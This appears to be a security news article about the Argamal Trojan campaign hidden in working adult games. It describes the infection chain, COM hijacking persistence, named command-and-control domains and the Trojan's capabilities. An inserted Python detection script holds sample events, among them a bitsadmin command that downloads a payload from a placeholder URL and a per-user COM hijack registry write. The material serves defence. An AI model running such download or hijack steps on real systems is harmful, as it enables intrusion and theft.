Hackers Hide Argamal Malware Inside Fully Functional Adult Games
Cybersecurity researchers at Kaspersky have uncovered a malware campaign that uses adult-themed video games to infect users with a powerful remote access Trojan known as Argamal. First detected in April 2026, the campaign targets people downloading hentai games from adult gaming websites, file-sharing services, and torrent platforms.
Unlike typical malware scams that distribute broken or non-functional files, these malicious downloads contain fully working games built on popular engines such as RenPy and RPG Maker. The games launch and operate normally, making it difficult for victims to realize that their systems have been compromised.
How the Infection Process Works
The malicious game installers are distributed through adult game websites, file-sharing services such as PixelDrain, and torrent trackers including AniRena.
Once a game is launched, the installer loads a modified FFmpeg DLL file along with a file named natives2_blob.bin. The altered library quietly executes in memory and launches a PowerShell script without displaying any warnings to the user.
Before proceeding, the script checks the system for analysis and monitoring tools such as Sandboxie and Procmon64. If no security monitoring tools are detected, the malware remains dormant to avoid raising suspicion.
Three days after infection, a scheduled task activates and uses bitsadmin.exe to download an encrypted file called zaesdl.dat from GitHub. The file is then decrypted with AES-CBC and unpacked into the primary Argamal Trojan component.
Persistence Through COM Hijacking
To maintain long-term access, Argamal employs a technique known as COM hijacking. The malware modifies Windows registry entries associated with the legitimate Windows Color System Calibration Loader.
Because this Windows component runs automatically whenever a user signs in, the malware is launched during every login session, ensuring persistent access even after system restarts.
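As an added detection example (not code from Kaspersky's report or from this article), the following Python scans constructed Sysmon-style event records for the two host-side behaviours described in the download stage and the persistence section above: a per-user CLSID InprocServer32 override, which is how COM hijacking redirects a system component to an attacker DLL, and a bitsadmin.exe transfer from a remote URL. The CLSID, file paths and URL are placeholders, not indicators from the report.

```python
import re

# Constructed sample events in a Sysmon-like shape (not from the article).
# The CLSID, DLL paths and URL are placeholders; only the behaviours are real.
SAMPLE_EVENTS = [
    {"type": "registry_set",
     "key": r"HKCU\Software\Classes\CLSID\{PLACEHOLDER-CLSID}\InprocServer32",
     "value": "(Default)", "data": r"C:\Users\victim\AppData\Roaming\loader.dll"},
    {"type": "process_create",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer job /download /priority foreground "
                r"https://github.com/PLACEHOLDER/zaesdl.dat C:\Users\victim\zaesdl.dat"},
    {"type": "registry_set",  # machine-wide key: normal software registration
     "key": r"HKLM\Software\Classes\CLSID\{PLACEHOLDER-CLSID}\InprocServer32",
     "value": "(Default)", "data": r"C:\Windows\System32\legit.dll"},
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

HKCU_INPROC = re.compile(r"^HKCU\\Software\\Classes\\CLSID\\\{[^}]+\}\\InprocServer32", re.I)
URL_IN_CMD = re.compile(r"https?://\S+", re.I)

def is_com_hijack_candidate(ev):
    """A CLSID InprocServer32 value written under HKCU. The user hive is
    consulted before HKLM, so this DLL path replaces the system-wide server
    for that CLSID: the COM hijacking primitive the article describes."""
    return ev.get("type") == "registry_set" and bool(HKCU_INPROC.match(ev.get("key", "")))

def is_bitsadmin_download(ev):
    """bitsadmin.exe invoked with /transfer and a remote URL on the command line."""
    if ev.get("type") != "process_create":
        return False
    if not ev.get("image", "").lower().endswith("\\bitsadmin.exe"):
        return False
    cmd = ev.get("cmdline", "")
    return "/transfer" in cmd.lower() and bool(URL_IN_CMD.search(cmd))

def scan(events):
    """Return (rule, subject, detail) tuples for every event that matches a rule."""
    findings = []
    for ev in events:
        if is_com_hijack_candidate(ev):
            findings.append(("com_hijack_hkcu_inprocserver32", ev["key"], ev.get("data")))
        elif is_bitsadmin_download(ev):
            url = URL_IN_CMD.search(ev["cmdline"]).group(0)
            findings.append(("bitsadmin_download", ev["image"], url))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

In a real deployment the HKCU rule should be baselined against known per-user COM registrations, since some legitimate installers write there too.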
Capabilities of Argamal
Once active, Argamal establishes communication with attacker-controlled servers by sending regular UDP heartbeat messages. Researchers identified command-and-control domains including asper1.freeddns.org and Winst0.kozow.com.
After gaining control of the infected system, attackers can perform a wide range of malicious activities, including:
- Stealing files and sensitive documents
- Reading private messages and chats
- Collecting financial information
- Taking screenshots of user activity
- Replacing cryptocurrency wallet addresses
- Streaming live video from the infected device
- Executing remote commands
These capabilities effectively give cybercriminals complete remote control over compromised systems.
Growing Threat to Gamers
The campaign highlights an increasingly sophisticated trend in malware distribution, where attackers hide malicious code inside legitimate and fully functional software. By embedding malware in working games, cybercriminals reduce suspicion and increase the likelihood that victims will unknowingly install and run the infection.
Security experts advise users to avoid downloading software from untrusted websites, verify file sources before installation, and maintain updated security software to help detect emerging threats such as Argamal.